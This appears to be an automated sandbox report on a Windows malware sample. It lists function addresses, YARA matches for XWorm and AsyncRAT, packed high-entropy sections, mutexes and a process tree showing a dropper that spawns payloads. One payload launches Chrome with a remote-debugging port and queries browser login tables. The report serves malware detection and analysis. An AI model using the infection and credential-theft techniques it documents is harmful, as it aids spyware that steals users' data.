Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00444FB0	11_2_00444FB0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00429FBD	11_2_00429FBD
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 15_2_02870C38	15_2_02870C38
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 15_2_028709A1	15_2_028709A1
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 15_2_028709B0	15_2_028709B0
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 15_2_02870C28	15_2_02870C28
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Code function: 16_2_012D48A9	16_2_012D48A9
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 22_2_00E90C38	22_2_00E90C38
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 22_2_00E909A1	22_2_00E909A1
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 22_2_00E909B0	22_2_00E909B0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 22_2_00E90C28	22_2_00E90C28
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0040F036	23_2_0040F036
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00447080	23_2_00447080
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0040B940	23_2_0040B940
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0043F960	23_2_0043F960
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004459C0	23_2_004459C0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00429230	23_2_00429230
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00446A90	23_2_00446A90
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00410B14	23_2_00410B14
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0043EBF0	23_2_0043EBF0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004254A0	23_2_004254A0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00446550	23_2_00446550
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00433570	23_2_00433570
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00446D00	23_2_00446D00
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0042C520	23_2_0042C520
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004185D0	23_2_004185D0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00419E30	23_2_00419E30
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0040CFC8	23_2_0040CFC8
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00401040	23_2_00401040
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0041E860	23_2_0041E860
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00439860	23_2_00439860
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00440060	23_2_00440060
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00424800	23_2_00424800
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00433805	23_2_00433805
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004300C0	23_2_004300C0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004450F2	23_2_004450F2
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004130B1	23_2_004130B1
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00444946	23_2_00444946
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0040C900	23_2_0040C900
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0042C910	23_2_0042C910
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00445110	23_2_00445110
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0041A126	23_2_0041A126
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004089F0	23_2_004089F0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004461A0	23_2_004461A0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004451B0	23_2_004451B0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00429A40	23_2_00429A40
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00447250	23_2_00447250
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0042EA5C	23_2_0042EA5C
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00402A60	23_2_00402A60
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0040A260	23_2_0040A260
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0043226B	23_2_0043226B
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0043E200	23_2_0043E200
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0041AA07	23_2_0041AA07
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00415210	23_2_00415210
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00426210	23_2_00426210
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00432229	23_2_00432229
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004322C3	23_2_004322C3
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00414AF5	23_2_00414AF5
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00421290	23_2_00421290
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0042CA91	23_2_0042CA91
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0043CA9C	23_2_0043CA9C
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004202A8	23_2_004202A8
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00411351	23_2_00411351
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0040E320	23_2_0040E320
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0042BB24	23_2_0042BB24
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00440334	23_2_00440334
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0042DB8D	23_2_0042DB8D
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0042E39D	23_2_0042E39D
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00439BA0	23_2_00439BA0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0042E3B6	23_2_0042E3B6
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0043E460	23_2_0043E460
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00403470	23_2_00403470
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00437C30	23_2_00437C30
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0040C4D0	23_2_0040C4D0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00429CD0	23_2_00429CD0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00425CD0	23_2_00425CD0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00407CE0	23_2_00407CE0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00409490	23_2_00409490
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0042B494	23_2_0042B494
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004344A0	23_2_004344A0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0040BCB0	23_2_0040BCB0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0041B4B8	23_2_0041B4B8
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00431540	23_2_00431540
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00410562	23_2_00410562
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00428575	23_2_00428575
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0040FD00	23_2_0040FD00
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0042E500	23_2_0042E500
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00421D20	23_2_00421D20
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00436D94	23_2_00436D94
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004155A0	23_2_004155A0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00439E50	23_2_00439E50
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0041D670	23_2_0041D670
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0043F670	23_2_0043F670
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00429E79	23_2_00429E79
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00445E00	23_2_00445E00
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00403E10	23_2_00403E10
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0042F616	23_2_0042F616
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004046F2	23_2_004046F2
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00444E90	23_2_00444E90
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0043D69F	23_2_0043D69F
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004216A0	23_2_004216A0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0041CEAB	23_2_0041CEAB
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004026B0	23_2_004026B0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0040DEB0	23_2_0040DEB0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004206B0	23_2_004206B0
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00420F40	23_2_00420F40
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00442740	23_2_00442740
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0042DF62	23_2_0042DF62
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0041FF62	23_2_0041FF62
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0041BF71	23_2_0041BF71
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00408F10	23_2_00408F10
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_00406F16	23_2_00406F16
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0041C7D2	23_2_0041C7D2
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_0042BFDF	23_2_0042BFDF

Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: String function: 0040B250 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: String function: 004185C0 appears 102 times
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: String function: 00418C10 appears 87 times
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: String function: 0040B230 appears 44 times

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 952

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 26.2.MvowLGc.exe.3083298.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 26.2.MvowLGc.exe.3083298.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 26.2.MvowLGc.exe.3078e08.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 26.2.MvowLGc.exe.3078e08.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 27.2.RegAsm.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 27.2.RegAsm.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 26.2.MvowLGc.exe.3083298.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 26.2.MvowLGc.exe.3083298.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 26.2.MvowLGc.exe.3078e08.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 26.2.MvowLGc.exe.3078e08.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001A.00000002.2673955387.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001B.00000002.3393623748.0000000000382000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: MvowLGc.exe.7.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: random.exe	Static PE information: Section: sziqdakf ZLIB complexity 0.994125939849624
Source: skotes.exe.0.dr	Static PE information: Section: sziqdakf ZLIB complexity 0.994125939849624
Source: uniq.exe.7.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: uniq.exe.7.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: L65uNi1.exe.7.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: L65uNi1.exe.7.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: Section: ZLIB complexity 0.9983834134615385
Source: 7fOMOTQ[1].exe.7.dr	Static PE information: Section: bhaywimc ZLIB complexity 0.9944881206870687
Source: 7fOMOTQ.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9983834134615385
Source: 7fOMOTQ.exe.7.dr	Static PE information: Section: bhaywimc ZLIB complexity 0.9944881206870687
Source: 1VB7gm8.exe.7.dr	Static PE information: Section: ZLIB complexity 1.0004701967592593
Source: 1VB7gm8.exe.7.dr	Static PE information: Section: gfrqabhk ZLIB complexity 0.9946444095857272
Source: 1VB7gm8[1].exe.7.dr	Static PE information: Section: ZLIB complexity 1.0004701967592593
Source: 1VB7gm8[1].exe.7.dr	Static PE information: Section: gfrqabhk ZLIB complexity 0.9946444095857272
Source: 1VB7gm8.exe0.7.dr	Static PE information: Section: ZLIB complexity 1.0004701967592593
Source: 1VB7gm8.exe0.7.dr	Static PE information: Section: gfrqabhk ZLIB complexity 0.9946444095857272
Source: L65uNi1[1].exe.7.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: L65uNi1[1].exe.7.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: af53YGc[1].exe.7.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: af53YGc[1].exe.7.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: af53YGc.exe.7.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: af53YGc.exe.7.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037

Source: uniq.exe.7.dr, s1l70P8mWLYDmBOs6L.cs	Cryptographic APIs: 'CreateDecryptor'
Source: L65uNi1.exe.7.dr, s1l70P8mWLYDmBOs6L.cs	Cryptographic APIs: 'CreateDecryptor'
Source: af53YGc[1].exe.7.dr, s1l70P8mWLYDmBOs6L.cs	Cryptographic APIs: 'CreateDecryptor'
Source: af53YGc.exe.7.dr, s1l70P8mWLYDmBOs6L.cs	Cryptographic APIs: 'CreateDecryptor'

Source: uniq.exe.7.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: L65uNi1.exe.7.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: af53YGc[1].exe.7.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: af53YGc.exe.7.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='

Source: random.exe, 00000000.00000002.2212359189.0000000001065000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2173141930.0000000001065000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2173406164.0000000001065000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2172826270.0000000001065000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: =.COM;.EXE;.BAT;.CMD;.VBP

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.mine.winEXE@86/97@38/15

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe

Code function: 11_2_0043E150 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

11_2_0043E150

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\1VB7gm8[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\2SoBdTbyIPXnEHHy
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8012
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3640:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7864
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7744
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6648
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1444

Source: C:\Users\user\Desktop\random.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe

System information queried: HandleInformation

Source: C:\Users\user\Desktop\random.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 00000013.00000002.2694991608.00004A2C006AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: 1VB7gm8.exe, 00000008.00000003.2982274452.0000000005B4B000.00000004.00000020.00020000.00000000.sdmp, tj58q1v3w.8.dr, ycjw47qi5.8.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: chrome.exe, 00000013.00000002.2708690560.00004A2C00AE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT id,url,visit_time,from_visit,external_referrer_url,transition,segment_id,visit_duration,incremented_omnibox_typed_score,opener_visit,originator_cache_guid,originator_visit_id,originator_from_visit,originator_opener_visit,is_known_to_sync,consider_for_ntp_most_visited FROM visits WHERE visit_time>=? AND visit_time<? ORDER BY visit_time DESC, id DESCB;e

Source: random.exe	Virustotal: Detection: 54%
Source: random.exe	ReversingLabs: Detection: 50%

Source: random.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\random.exe

File read: C:\Users\user\Desktop\random.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe "C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe "C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe"
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process created: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe "C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe"
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 952
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe "C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe"
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process created: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe "C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe"
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6648 -s 936
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2956 --field-trial-handle=2864,i,16846066234531792387,18071606711430051804,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe "C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe"
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process created: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe "C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe"
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 8012 -ip 8012
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 940
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe "C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe"
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe "C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe"
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process created: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe "C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe"
